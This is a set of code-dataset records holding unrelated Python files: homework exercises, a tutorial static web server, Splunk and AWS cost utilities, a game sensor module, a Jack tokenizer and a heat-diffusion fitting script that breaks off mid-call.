\")\r\n\tif a in masterlist:\r\n\t\tfor x in masterlist:\r\n\t\t\tb = masterlist[x]\r\n\t\t\tif b.index(a) == 2:\r\n\t\t\t\tprint(b)\r\nelif search == 4:\r\n\ta = input(\"Address Line 1: \")\r\n\tif a in masterlist:\r\n\t\tfor x in masterlist:\r\n\t\t\tb = masterlist[x]\r\n\t\t\tif b.index(a) == 3:\r\n\t\t\t\tprint(b)\r\nelif search == 5:\r\n\ta = input(\"Address Line 2: \")\r\n\tif a in masterlist:\r\n\t\tfor x in masterlist:\r\n\t\t\tb = masterlist[x]\r\n\t\t\tif b.index(a) == 4:\r\n\t\t\t\tprint(b)\r\nelif search == 6:\r\n\ta = input(\"Post Code: \")\r\n\tif a in masterlist:\r\n\t\tfor x in masterlist:\r\n\t\t\tb = masterlist[x]\r\n\t\t\tif b.index(a) == 5:\r\n\t\t\t\tprint(b)\r\nelif search == 7:\r\n\ta = input(\"Telephone Number: \")\r\n\tif a in masterlist:\r\n\t\tfor x in masterlist:\r\n\t\t\tb = masterlist[x]\r\n\t\t\tif b.index(a) == 6:\r\n\t\t\t\tprint(b)\r\nelse:\r\n\tprint(\"Try Again, Read Menu\")\r\n\r\n\r\n# user = open(\"users.txt\",\"r\")\r\n\r\n# user2 = copy(user)\r\n# print(l)\r\n# print(\"--------\")\r\n# print(masterlist)\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"Lydia.py","file_name":"Lydia.py","file_ext":"py","file_size_in_byte":3316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"246362160","text":"\"\"\"\n3. Массив размером 2m + 1, где m – натуральное число, заполнен случайным образом.\nНайдите в массиве медиану. Медианой называется элемент ряда, делящий его на\nдве равные части: в одной находятся элементы, которые не меньше медианы,\nв другой – не больше медианы.\n\nЗадачу можно решить без сортировки исходного\nмассива.\n\nНо если это слишком сложно, то используйте метод сортировки,\nкоторый не рассматривался на уроках: Шелла, Гномья, ...\n\narr[m]\nfrom statistics import median\n\"\"\"\nimport random\n\n\"\"\"\nвариант решения без сортировки\n\"\"\"\nm = 5\norig_list = [random.randint(0, 50) for _ in range(2 * m + 1)]\nprint(f'Оригинальный массив: {orig_list}')\n\nfor i in range(len(orig_list)):\n left = []\n right = []\n for k in range(len(orig_list)):\n if i == k:\n continue\n if orig_list[k] < orig_list[i]:\n left.append(orig_list[k])\n elif orig_list[k] > orig_list[i]:\n right.insert(0, orig_list[k])\n else:\n if len(left) > len(right):\n right.append(orig_list[k])\n else:\n left.insert(0, orig_list[k])\n print(f'Итерация: {i + 1}\\n\\tЛевая часть: {left}\\n\\tПравая часть: {right}\\n\\n')\n if len(left) == len(right) == m:\n print(f'Медиана ====> {orig_list[i]}')\n break\n left.clear()\n right.clear()\n\n\"\"\"\nвариант с использованием гномьей сортировки\n\"\"\"\n\n\ndef gnome_sort(orig_list):\n i = 1\n j = 2\n while i < len(orig_list):\n if orig_list[i - 1] < orig_list[i]:\n i = j\n j += 1\n else:\n orig_list[i], orig_list[i - 1] = orig_list[i - 1], orig_list[i]\n i -= 1\n if i == 0:\n i = j\n j += 1\n return orig_list\n\n\nm = 5\norig_list = [random.randint(0, 50) for _ in range(2 * m + 1)]\nsorted_list = gnome_sort(orig_list)\nprint(f'Оригинальный массив: {orig_list}\\n\\tОтсортированный массив: {sorted_list}')\nif sorted_list[m - 1] <= sorted_list[m] <= sorted_list[m + 1]:\n print(f'Медиана ====> {sorted_list[m]}')\n","sub_path":"lesson7/task_3.py","file_name":"task_3.py","file_ext":"py","file_size_in_byte":2540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"191682997","text":"import socket\nimport os\n\n\ndef main():\n # 创建tcp服务端套接字\n tcp_server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n # 设置端口号复用,程序退出端口号立即释放\n tcp_server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, True)\n # 绑定端口号\n tcp_server_socket.bind((\"\", 8000))\n # 设置监听\n tcp_server_socket.listen(128)\n # 循环等待接受客户端的连接请求\n while True:\n # 等待接受客户端的连接请求\n new_socket, ip_port = tcp_server_socket.accept()\n # 代码执行到此,说明连接建立成功\n # 接收客户端的请求信息\n recv_data = new_socket.recv(4096)\n # 判断接收的数据长度是否为0\n if len(recv_data) == 0:\n new_socket.close()\n return\n\n # 对二进制数据进行解码\n recv_content = recv_data.decode(\"utf-8\")\n print(recv_content)\n\n # 对数据按照空格进行分割\n request_list = recv_content.split(\" \", maxsplit=2)\n # 获取请求的资源路径\n request_path = request_list[1]\n print(request_path)\n\n # 判断请求的是否是根目录,如果是根目录设置返回的信息\n if request_path == \"/\":\n request_path = \"/index.html\"\n\n # 1. os.path.exits\n # os.path.exists(\"static/\" + request_path)\n # 2. try-except\n\n # 打开文件读取文件中的数据, 提示:这里使用rb模式,兼容打开图片文件\n with open(\"static\" + request_path, \"rb\") as file: # 这里的file表示打开文件的对象\n file_data = file.read()\n # 提示: with open 关闭文件这步操作不用程序员来完成,系统帮我们来完成\n\n # 代码执行到此,说明文件存在,返回200状态信息\n # 响应行\n response_line = \"HTTP/1.1 200 OK\\r\\n\"\n # 响应头\n response_header = \"Server: PWS/1.0\\r\\n\"\n # 响应体\n response_body = file_data\n\n # 把数据封装成http 响应报文格式的数据\n response = (response_line +\n response_header +\n \"\\r\\n\").encode(\"utf-8\") + response_body\n\n # 发送给浏览器的响应报文数据\n new_socket.send(response)\n\n # 关闭服务于客户端的套接字\n new_socket.close()\n\n\n# 判断是否是主模块的代码\nif __name__ == '__main__':\n main()\n\n\n\n\n","sub_path":"03-Python高级语法/2019-版本/01-网络编程/day02-{HTTP协议和静态Web服务器}/04-代码/day06/02-静态web服务器-返回指定页面数据.py","file_name":"02-静态web服务器-返回指定页面数据.py","file_ext":"py","file_size_in_byte":2481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"602220039","text":"# -*- coding: utf-8 -*-\n#\n# (c) Copyright IBM Corp. 2010, 2022. All Rights Reserved.\n#\nfrom logging import getLogger\nfrom resilient_lib import validate_fields, IntegrationError\nfrom fn_splunk_integration.util.splunk_utils import SplunkServers\nfrom fn_splunk_integration.util.splunk_constants import PACKAGE_NAME, GET_FIELD, UPDATE_FIELD\n\nLOG = getLogger(__name__)\n\ndef make_query_string(query_string, params):\n \"\"\"\n Substitute parameters into the query\n :param query: Input query with params\n :param params: Values used to substitute\n :return: (str) Query with params substitued\n \"\"\"\n\n index = 1\n for param in params:\n if param:\n to_replace = \"%%param%d%%\" % index\n query_string = query_string.replace(to_replace, param)\n index += 1\n\n return query_string\n\ndef make_item_dict(params):\n \"\"\"\n Use the params List to build a dict\n :param params: Parameter list\n :return: dict\n \"\"\"\n ret = {}\n\n list_len = len(params)\n if list_len%2 != 0:\n raise IntegrationError(str(params))\n\n index = 0\n while index < list_len:\n if params[index]:\n # Allow the value (params[index + 1] here) to be empty (None)?\n # Let Splunk to return an error if it does not support empty value\n ret[params[index]] = params[index + 1]\n else:\n # If key is None, we can not add it to the dictionary\n LOG.debug(\"The {}th key is None with value {}\".format(str(index), str(params[index + 1])))\n index += 2\n\n return ret\n\ndef get_servers_list(opts):\n \"\"\"\n Used for initilizing or reloading the options variable\n :param opts: List of options\n :return: List of splunk servers\n \"\"\"\n servers_list = {}\n\n options = opts.get(PACKAGE_NAME, {})\n\n if options: # If no label given [fn_splunk_integration]\n server_list = {PACKAGE_NAME}\n else: # If label given [fn_splunk_integration:label]\n servers = SplunkServers(opts, options)\n server_list = servers.get_server_name_list()\n\n # Creates a dictionary that is filled with the splunk servers\n # and there configurations \n for server_name in server_list:\n servers_list[server_name] = opts.get(server_name, {})\n validate_fields([\"host\", \"port\", \"username\", \"splunkpassword\"], servers_list[server_name])\n\n return servers_list\n\ndef update_splunk_servers_select_list(servers_list, res_rest_client, field_name):\n \"\"\"\n Update values in splunk_servers select field\n :param servers_list: List of splunk servers in app.config\n :param res_rest_client: SOAR rest client connection\n :param field_name: Activity field name\n :return: None\n \"\"\"\n\n # Create list of splunk server labels\n server_name_list = []\n for server in servers_list:\n if \":\" in server:\n server_name_list.append(server[server.index(\":\")+1:])\n else:\n server_name_list.append(server)\n\n try:\n payload = res_rest_client.get(GET_FIELD.format(field_name))\n\n if type(payload) == list or payload.get(\"input_type\") != \"select\":\n return None\n\n # Create payload \n if server_name_list:\n\n # Put payload with no values to delete old values\n del payload[\"values\"]\n res_rest_client.put(UPDATE_FIELD.format(field_name), payload)\n\n # Add values to the payload\n payload[\"values\"] = [\n {\"label\": str(value), \"enabled\": True, \"hidden\": False}\n for value in server_name_list\n ]\n # Put payload with values to SOAR\n res_rest_client.put(UPDATE_FIELD.format(field_name), payload)\n\n except Exception as err_msg:\n LOG.warning(\"Action failed: {} error: {}\".format(field_name, err_msg))\n raise IntegrationError(\"Error while updating action field: {}\".format(field_name))\n","sub_path":"fn_splunk_integration/fn_splunk_integration/util/function_utils.py","file_name":"function_utils.py","file_ext":"py","file_size_in_byte":3883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"149027292","text":"#This code is based on HSSensor.cpp and HSSensor.h from the HSpace project.\r\nfrom __future__ import absolute_import, division\r\n\r\nfrom random import randint\r\nfrom math import sqrt\r\nfrom attr import attr, attributes\r\n\r\nfrom ..import signals\r\nfrom ..helpers import event, type_filter\r\n\r\nfrom .system import System, SystemInstance\r\n\r\n@attributes(slots=True)\r\nclass Sensor (System):\r\n\t\"\"\" This class represents a sensor system. \"\"\"\r\n\tstrength = attr(default=0)\r\n\tdimensional = attr(default=False)\r\n\ttable = \"sensors\"\r\n\r\n\t@classmethod\r\n\tdef display_name(self):\r\n\t\treturn \"Sensor\"\r\n\r\n@attributes\r\nclass SensorInstance (SystemInstance):\r\n\t\"\"\" This represents an instance of the sensor system. \"\"\"\r\n\r\n\tdef cycle(self):\r\n\t\tfrom pyspace import systems\r\n\t\tfrom pyspace import space_objects\r\n\t\tfrom pyspace.systems.computer import SensorContact\r\n\t\tif not self.current_power:\r\n\t\t\treturn\r\n\t\tsuper(SensorInstance, self).cycle()\r\n\t\tcomputer = self.ship.find_computer()\r\n\t\tif computer is None:\r\n\t\t\treturn\r\n\t\tif not computer.is_online():\r\n\t\t\treturn\r\n\t\tmy_univ = self.ship.universe\r\n\t\tif my_univ is None:\r\n\t\t\treturn\r\n\t\tif self.ship.landed_loc is not None:\r\n\t\t\treturn\r\n\t\tdd_engaged = self.ship.has_dd_engaged\r\n\t\t#nebulae = type_filter(my_univ.objects, space_objects.Nebula)\r\n\t\tnebulae = [] \r\n\r\n\t\t#Calculate the nebula effect for an object.\r\n\t\tdef calc_nebula_effect(obj):\r\n\t\t\tnebula_effect = 1.0\r\n\t\t\tfor nebula in nebulae:\r\n\t\t\t\tdiff_vec = nebula.location - obj.location\r\n\t\t\t\tif diff_vec.length < nebula.radius:\r\n\t\t\t\t\tfalloff = 1.0 - nebula.fallof * (diff_vector.length / nebula.radius)\r\n\t\t\t\t\tnebula_effect *= nebula.sensor_effect * falloff\r\n\t\t\treturn nebula_effect\r\n\r\n\t\t#Get local nebula effect.\r\n\t\tlocal_nebula_effect = calc_nebula_effect(self.ship)\r\n\r\n\t\t#Detect objects in the same universe.\r\n\t\tin_range = my_univ.objects_around(self.ship.location, range=self.strength)\r\n\t\tcontact_objects = {}\r\n\t\tcontact_ids = set()\r\n\t\tfor c in computer.sensor_contacts:\r\n\t\t\tcontact_objects[c.object] = c\r\n\t\t\tcontact_ids.add(c.id)\r\n\t\tstrength = self.strength_adjusted\r\n\t\tfor obj in in_range:\r\n\t\t\tif not obj.in_space or obj is self.ship:\r\n\t\t\t\tcontinue\r\n\t\t\ttarget_dd_engaged = False\r\n\t\t\tif isinstance(obj, space_objects.Ship):\r\n\t\t\t\ttarget_dd_engaged = obj.has_dd_engaged\r\n\t\t\tif dd_engaged != target_dd_engaged and not self.dimensional:\r\n\t\t\t\tcontinue\r\n\t\t\tdiff_vector = obj.location - self.ship.location\r\n\t\t\tdistance = diff_vector.length\r\n\t\t\tif distance == 0:\r\n\t\t\t\tdetail = 100.0\r\n\t\t\telse:\r\n\t\t\t\tdistance /= 100000\r\n\t\t\t\tdetail = obj.size**2 * strength * (self.current_power / self.optimal_power) * local_nebula_effect\r\n\t\t\t\tif hasattr(obj, 'power_output') and obj.power_output > 1.0:\r\n\t\t\t\t\tdetail *= (obj.power_output / 1000)\r\n\t\t\t\tdetail /= distance ** 3\r\n\t\t\t\tdetail = sqrt(sqrt(detail))\r\n\t\t\t\tdistance *= 1000000.0\r\n\t\t\t\tif detail < 1.0:\r\n\t\t\t\t\tcontinue\r\n\t\t\t\tdetail *= calc_nebula_effect(obj)\r\n\t\t\t\tif detail < 1.0:\r\n\t\t\t\t\tcontinue\r\n\t\t\t\tif detail > 100.0:\r\n\t\t\t\t\tdetail = 100.0\r\n\t\t\tcontact_found = False\r\n\t\t\tcontact = contact_objects.get(obj)\r\n\t\t\tif contact is not None:\r\n\t\t\t\tcontact_found = True\r\n\t\t\t\tif contact.refreshed:\r\n\t\t\t\t\tif contact.detail > detail:\r\n\t\t\t\t\t\tcontact.detail = detail\r\n\t\t\t\t\t\tcontact.diff_vector = diff_vector\r\n\t\t\t\tcontact.refreshed = True\r\n\t\t\t\tcontact.detail = detail\r\n\t\t\t\tcontact.diff_vector = diff_vector\r\n\t\t\tif contact_found:\r\n\t\t\t\tcontinue\r\n\t\t\tnew_contact = SensorContact(object=obj, detail=detail, diff_vector=diff_vector, refreshed=True)\r\n\t\t\tid_used = True\r\n\t\t\twhile id_used:\r\n\t\t\t\tnew_contact.id = randint(1000, 9999)\r\n\t\t\t\tid_used = new_contact.id in contact_ids\r\n\t\t\tcontact_ids.add(new_contact.id)\r\n\t\t\tcomputer.sensor_contacts.append(new_contact)\r\n\t\t\tif isinstance(obj, space_objects.Missile):\r\n\t\t\t\tself.ship.notify_consoles_formatted(\"Sensors\", \"Missile! Contact %d\" % new_contact.id)\r\n\t\t\telse:\r\n\t\t\t\tself.ship.notify_consoles_formatted(\"Sensors\", \"New contact %d\" % new_contact.id)\r\n\t\t\tcomputer.event_sensor_contact_appeared(contact=new_contact)\r\n","sub_path":"pyspace/systems/sensor.py","file_name":"sensor.py","file_ext":"py","file_size_in_byte":3931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"137219974","text":"from skillsmatrixprofile import app\nfrom flask import jsonify, redirect, render_template, request, url_for\nimport simplejson\nfrom google.appengine.api import users\n\n@app.route(\"/\")\ndef index():\n return redirect(url_for(\"view_chart\"))\n\n@app.route('/update_chart', methods = ['POST', 'GET'])\ndef update_chart():\n name = request.form['name']\n skill_names = request.form.getlist('skill_name')\n skill_rating = string_to_int_list(request.form.getlist('skill_rating'))\n skill_years = string_to_int_list(request.form.getlist('skill_years'))\n dict = {}\n dict['chart'] = { \"renderTo\": \"chart-container-1\", \"defaultSeriesType\": \"bar\" }\n dict['title'] = { \"text\": name }\n dict['xAxis'] = { \"categories\": skill_names }\n dict['yAxis'] = { \"title\": { \"text\": \"Skill Level / Years of Experience\" }, \"allowDecimals\": False, }\n dict['series'] = [\n {\n \"name\": \"Skill Level\",\n \"data\": skill_rating },\n {\n \"name\": \"Years of Experience\",\n \"data\": skill_years\n }\n ]\n return jsonify(result=dict)\n\n@app.route(\"/chart\")\ndef view_chart():\n return render_template(\"chart.html\")\n\ndef string_to_int_list(strings):\n result = []\n for s in strings:\n result.append(int(s))\n return result\n","sub_path":"skillsmatrixprofile/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"589137857","text":"import string\nimport abc\n\n\nclass Token:\n KEYWORDS = set(\n [\n \"class\",\n \"constructor\",\n \"function\",\n \"method\",\n \"field\",\n \"static\",\n \"var\",\n \"int\",\n \"char\",\n \"boolean\",\n \"void\",\n \"true\",\n \"false\",\n \"null\",\n \"this\",\n \"let\",\n \"do\",\n \"if\",\n \"else\",\n \"while\",\n \"return\",\n ]\n )\n\n SYMBOLS = set(\n [\n \"{\",\n \"}\",\n \"(\",\n \")\",\n \"[\",\n \"]\",\n \".\",\n \",\",\n \";\",\n \"+\",\n \"-\",\n \"*\",\n \"/\",\n \"&\",\n \"|\",\n \"<\",\n \">\",\n \"=\",\n \"~\",\n ]\n )\n\n @staticmethod\n def create(token_str):\n if token_str in Token.KEYWORDS:\n return Keyword(token_str)\n elif token_str in Token.SYMBOLS:\n return Symbol(token_str)\n elif all([d in string.digits for d in token_str]):\n return IntegerConstant(token_str)\n elif token_str[0] == '\"' and token_str[-1] == '\"':\n return StringConstant(token_str[1:-1])\n else:\n return Identifier(token_str)\n\n def __init__(self):\n self.name = \"Token\"\n self.val = \"TokenValue\"\n self.tab_size = 2\n\n @abc.abstractmethod\n def __repr__(self):\n return f\"{self.name}({self.val})\"\n\n\nclass Keyword(Token):\n def __init__(self, val):\n super(Keyword, self).__init__()\n self.name = \"Keyword\"\n self.val = val\n\n def __eq__(self, other) -> bool:\n if isinstance(other, Keyword):\n return self.val == other.val\n\n def to_xml(self, lvl=0):\n return f\"{' ' * self.tab_size * lvl} {self.val} \"\n\n\nclass Symbol(Token):\n def __init__(self, val):\n super(Symbol, self).__init__()\n self.name = \"Symbol\"\n self.val = val\n\n def __eq__(self, other) -> bool:\n if isinstance(other, Symbol):\n return self.val == other.val\n\n def to_xml(self, lvl=0):\n if self.val == \"<\":\n return f\"{' ' * self.tab_size * lvl} < \"\n elif self.val == \">\":\n return f\"{' ' * self.tab_size * lvl} > \"\n elif self.val == \"&\":\n return f\"{' ' * self.tab_size * lvl} & \"\n else:\n return f\"{' ' * self.tab_size * lvl} {self.val} \"\n\n\nclass IntegerConstant(Token):\n def __init__(self, val: str):\n super(IntegerConstant, self).__init__()\n self.name = \"IntegerConstant\"\n self.val = val\n\n def __eq__(self, other) -> bool:\n if isinstance(other, IntegerConstant):\n return self.val == other.val\n\n def to_xml(self, lvl=0):\n return f\"{' ' * self.tab_size * lvl} {self.val} \"\n\n\nclass StringConstant(Token):\n def __init__(self, val):\n super(StringConstant, self).__init__()\n self.name = \"StringConstant\"\n self.val = val\n\n def __eq__(self, other) -> bool:\n if isinstance(other, StringConstant):\n return self.val == other.val\n\n def to_xml(self, lvl=0):\n return (\n f\"{' ' * self.tab_size * lvl} {self.val} \"\n )\n\n\nclass Identifier(Token):\n def __init__(self, val):\n super(Identifier, self).__init__()\n self.name = \"Identifier\"\n self.val = val\n\n def __eq__(self, other) -> bool:\n if isinstance(other, Identifier):\n return self.val == other.val\n\n def to_xml(self, lvl=0):\n return f\"{' ' * self.tab_size * lvl} {self.val} \"\n","sub_path":"projects/10/syntax_analyzer/lib/jack_token.py","file_name":"jack_token.py","file_ext":"py","file_size_in_byte":3878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"231158584","text":"import boto3\nclient = boto3.client('ce')\n\nresponse = client.get_cost_and_usage(\n TimePeriod={\n 'Start': '2020-05-01',\n 'End': '2020-05-20'\n },\n Granularity='DAILY',\n Filter={\n 'Or': [\n {'... recursive ...'},\n ],\n 'And': [\n {'... recursive ...'},\n ],\n 'Not': {'... recursive ...'},\n 'Dimensions': {\n \"Key\": \"LINKED_ACCOUNT\",\n \"Values\": [751900335485],\n 'MatchOptions': [\n 'EQUALS',\n ]\n },\n 'CostCategories': {\n 'Key': 'string',\n 'Values': [\n 'string',\n ]\n }\n },\n Metrics=[\n 'string',\n ],\n GroupBy=[\n {\n 'Type': 'DIMENSION',\n 'Key': 'string'\n },\n ],\n NextPageToken='string'\n)\n'''result = client.get_cost_and_usage(\n TimePeriod = {\n 'Start': '01-05-2020',\n 'End': '20-05-2020'\n },\n Granularity = 'DAILY',\n Filter = {\n \"And\": [{\n \"Dimensions\": {\n \"Key\": \"LINKED_ACCOUNT\",\n \"Values\": [751900335485]\n }\n }, {\n \"Not\": {\n \"Dimensions\": {\n \"Key\": \"RECORD_TYPE\",\n \"Values\": [\"Credit\", \"Refund\"]\n }\n }\n }]\n },\n Metrics = [\"BlendedCost\"],\n GroupBy = [\n {\n 'Type': 'DIMENSION',\n 'Key': 'SERVICE'\n },\n {\n 'Type': 'DIMENSION',\n 'Key': 'USAGE_TYPE'\n }\n ]\n)\n'''","sub_path":"test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"555079141","text":"from human import Human\n\nfrom random import randint\n\nclass Hero(Human):\n\t\n\tdef __init__(self, name, house):\n\t\tsuper(Hero, self).__init__()\n\t\tself.name = name\n\t\tself.house = house\n\t\tself.home = self._find_home(house)\n\t\tself.location = self.home\n\t\n\tdef _find_home(self, house):\n\t\thomes = {'Stark': 'Winterfell', \n\t\t\t\t'Lannister': 'Casterly Rock', \n\t\t\t\t'Baratheon': \"Storm's End\", \n\t\t\t\t'Tyrell': 'Highgarden', \n\t\t\t\t'Tully': 'Riverrun'}\n\t\t\t\t\n\t\thome = homes[house]\n\t\treturn home\n\t\t\n\tdef attack(self):\n\t\tattack = randint(0, 100)\n\t\treturn attack\n\t\t\n\tdef defend(self):\n\t\tdefend = randint(0, 50)\n\t\treturn defend","sub_path":"ex45/hero.py","file_name":"hero.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"329770085","text":"from datetime import datetime\nfrom itertools import count\nfrom math import ceil, floor\nfrom os import path, makedirs\nfrom scipy.optimize import least_squares\nimport numpy as np\nfrom matplotlib import pyplot as plt, colors, cm\nfrom simu1d import Simulation, run_simulation_opt\nfrom opt_diffusion_1d import make_params_dict\nfrom opt_diffusion_1d import get_exp_time_temp_arrays\nfrom diffusion_1d import PERIMETER, AREA, MIN_X, MAX_X\nfrom diffusion_1d_v3 import explicit_diffusion_simple\n# from diffusion_1d_v2 import implicit_mod_diffusion_simple\n# from diffusion_1d_v2 import implicit_mod2_diffusion_simple\n\n\n# input files\nDATA_FPATHS = [\n # '../../data/temperature data/June 1/Run1_tc1_June1.dat',\n '../../data/temperature data/June 1/Run1_tc2_June1.dat',\n '../../data/temperature data/June 1/Run1_tc3_June1.dat',\n # '../../data/temperature data/June 1/Run1_tc4_June1.dat',\n]\n# output files\nOPT_FPATH = '../results/June 1 - Run 1/params_2tcs.dat'\nSIM_FPATH = '../results/June 1 - Run 1/sim_2tcs.dat'\n\nEXP_X_ARRAY = np.array(sorted([.33 - .01555 - .0725*n for n in [1, 2]]))\n\nMETHOD = explicit_diffusion_simple\nHEATING_ONLY = False\n\nTIME_STEP = .25\nDIM_X = 66 + 1\n\nU_0 = 303.\nU_AMB = 297.\nTHERMAL_CONDUCTIVITY = 125.\nSPECIFIC_HEAT = 380.\nMASS_DENSITY = 8730.\nCONVECTION_COEFF = 1.95\nEMISSIVITY = .01\nPOWER = 15.36216 # set to V^2/15, look in spreadsheet for V\nPOWER2 = -10.\nSTOP_TIME = 900. # set to value for run listed in spreadsheet\n\nALL_PARAMS_DICT = dict(\n u_0=U_0,\n u_amb=U_AMB,\n thermal_conductivity=THERMAL_CONDUCTIVITY,\n specific_heat=SPECIFIC_HEAT,\n mass_density=MASS_DENSITY,\n convection_coeff=CONVECTION_COEFF,\n emissivity=EMISSIVITY,\n power=POWER,\n power2=POWER2,\n stop_time=STOP_TIME,\n perimeter=PERIMETER,\n area=AREA,\n)\n\nPARAMS_GUESS_DICT = dict(\n u_0=U_0,\n u_amb=U_AMB,\n thermal_conductivity=THERMAL_CONDUCTIVITY,\n specific_heat=SPECIFIC_HEAT,\n mass_density=MASS_DENSITY,\n convection_coeff=CONVECTION_COEFF,\n emissivity=EMISSIVITY,\n power=POWER,\n power2=POWER2,\n # stop_time=STOP_TIME,\n)\n\nPARAMS_BOUNDS_DICT = dict(\n u_0=(.95*U_0, 1.05*U_0),\n u_amb=(.9*U_AMB, 1.1*U_AMB),\n thermal_conductivity=(.8*THERMAL_CONDUCTIVITY, 1.2*THERMAL_CONDUCTIVITY),\n specific_heat=(.95*SPECIFIC_HEAT, 1.05*SPECIFIC_HEAT),\n mass_density=(.95*MASS_DENSITY, 1.05*MASS_DENSITY),\n convection_coeff=(0., 1000.),\n emissivity=(0., 1.),\n power=(0., POWER),\n power2=(-POWER, 0)\n # stop_time=(STOP_TIME-10, STOP_TIME+10),\n)\n\nALL_PARAMS_DICT.update(PARAMS_GUESS_DICT)\n\n\ndef _first_iteration_plot(\n ax, time_step, exp_temp_array, sim_temp_array, fit_lines):\n num_steps, num_lines = exp_temp_array.shape\n time_array = np.array([time_step * x for x in range(num_steps)])\n # get colors\n c_norm = colors.Normalize(vmin=0, vmax=num_lines-1)\n scalar_map = cm.ScalarMappable(norm=c_norm, cmap=plt.get_cmap('jet'))\n for exp_line, sim_line, i in zip(\n exp_temp_array.T, sim_temp_array.T, count()):\n clr = scalar_map.to_rgba(i)\n ax.plot(\n time_array, exp_line, '-', color=clr,\n label='TC {} data'.format(i+1)\n )\n line, = ax.plot(\n time_array, sim_line, '--', color=clr,\n )\n fit_lines.append(line)\n plt.xlabel('Time (s)')\n plt.ylabel('Temperature (K)')\n plt.title('Temperature vs Time Data for Simulation')\n plt.legend()\n plt.show(block=False)\n\n\ndef _update_iteration_plot(fig, fit_lines, sim_temp_array):\n for line, col in zip(fit_lines, sim_temp_array.T):\n line.set_ydata(col)\n fig.canvas.draw()\n\n\ndef _lsq_func_simp(\n params_arr, const_params_dict, variable_params_keys,\n exp_time_array, exp_x_array, exp_temp_array,\n x_array, num_steps, time_step,\n finite_step_method, sim_fpath, iteration_fn,\n figure=None, ax=None, fit_lines=None,\n):\n params_dict = make_params_dict(\n params_arr=params_arr, const_params_dict=const_params_dict,\n variable_params_keys=variable_params_keys\n )\n t_0 = params_dict['u_0']\n iter_num = next(iteration_fn)\n num_params = len(params_arr) + 1\n sub_iter = iter_num % num_params\n print('\\nIteration {}-{}'.format(\n floor(iter_num/num_params), sub_iter))\n i = 0\n for k, v in sorted(params_dict.items()):\n if k in variable_params_keys:\n i += 1\n if i == sub_iter:\n print('\\033[96m *{:24}: {}\\033[0m'.format(k, v))\n elif 0 == sub_iter:\n print('\\033[96m {:24}: {}\\033[0m'.format(k, v))\n else:\n print(' {:24}: {}'.format(k, v))\n del params_dict['u_0']\n sim = Simulation(\n time_step=time_step, x_array=x_array, t_0=t_0,\n finite_step_method=finite_step_method, params_dict=params_dict,\n boundary_conditions=None,\n )\n sim_temp_array = run_simulation_opt(\n simulation=sim, num_steps=num_steps, fpath=sim_fpath,\n exp_time_array=exp_time_array, exp_x_array=exp_x_array,\n )\n residuals = (sim_temp_array.flatten() - exp_temp_array.flatten())\n # return residuals\n m, n = sim_temp_array.shape\n # diff_arr = residuals * np.array(\n # [np.exp(-floor(i/n)/(m-1)) for i in range(m*n)])\n diff_arr = residuals\n print(' Sum of squares per point (res) = {}'.format(\n np.dot(residuals, residuals)/(m*n)))\n print(' Sum of squares per point (opt) = {}'.format(\n np.dot(diff_arr, diff_arr)/(m*n)))\n if iter_num == 0:\n _first_iteration_plot(\n ax=ax, time_step=time_step,\n exp_temp_array=exp_temp_array, sim_temp_array=sim_temp_array,\n fit_lines=fit_lines,\n )\n else:\n _update_iteration_plot(\n fig=figure, fit_lines=fit_lines, sim_temp_array=sim_temp_array)\n return diff_arr\n\n\ndef optimize_diffusion_simp_parameters_with_bounds(\n params_guess_dict, params_bounds_dict, const_params_dict,\n exp_time_array, exp_x_array, exp_temp_array,\n x_array, num_steps, time_step, finite_step_method, sim_fpath,\n lsq_fn=_lsq_func_simp,\n):\n params_guess = np.array([v for k, v in sorted(params_guess_dict.items())])\n if params_bounds_dict is None:\n bounds = None\n else:\n pgi = sorted(params_bounds_dict.items())\n lower_bounds = np.array([v[0] for k, v in pgi])\n upper_bounds = np.array([v[1] for k, v in pgi])\n bounds = (lower_bounds, upper_bounds)\n iter_fn = count()\n fig = plt.figure()\n ax = fig.add_subplot(111)\n fit_lines = list()\n return least_squares(\n fun=lsq_fn, x0=params_guess, bounds=bounds, verbose=2,\n args=(\n const_params_dict, params_guess_dict.keys(),\n exp_time_array, exp_x_array, exp_temp_array,\n x_array, num_steps, time_step,\n finite_step_method, sim_fpath, iter_fn, fig, ax, fit_lines\n ),\n )\n\n\n# script\nif __name__ == '__main__':\n # make results directories\n opt_dpath = path.split(OPT_FPATH)[0]\n sim_dpath = path.split(SIM_FPATH)[0]\n if not path.exists(opt_dpath):\n makedirs(opt_dpath)\n if not path.exists(sim_dpath):\n makedirs(sim_dpath)\n # determine which parameters to hold constant\n const_keys = filter(\n lambda k: k not in PARAMS_GUESS_DICT, ALL_PARAMS_DICT.keys())\n const_params_dict0 = {k: ALL_PARAMS_DICT[k] for k in const_keys}\n # get experimental arrays\n exp_time_array0, exp_temp_array0 = get_exp_time_temp_arrays(\n dat_fpaths_list=DATA_FPATHS\n )\n # find index of last time before stop time\n if HEATING_ONLY:\n for time, ii in zip(exp_time_array0, range(len(exp_time_array0))):\n if time > STOP_TIME:\n exp_time_array0 = exp_time_array0[:ii]\n exp_temp_array0 = exp_temp_array0[:ii]\n break\n # get num_steps\n num_steps0 = ceil(exp_time_array0[-1] / TIME_STEP)\n print(num_steps0)\n # run optimization\n result = optimize_diffusion_simp_parameters_with_bounds(\n params_guess_dict=PARAMS_GUESS_DICT,\n 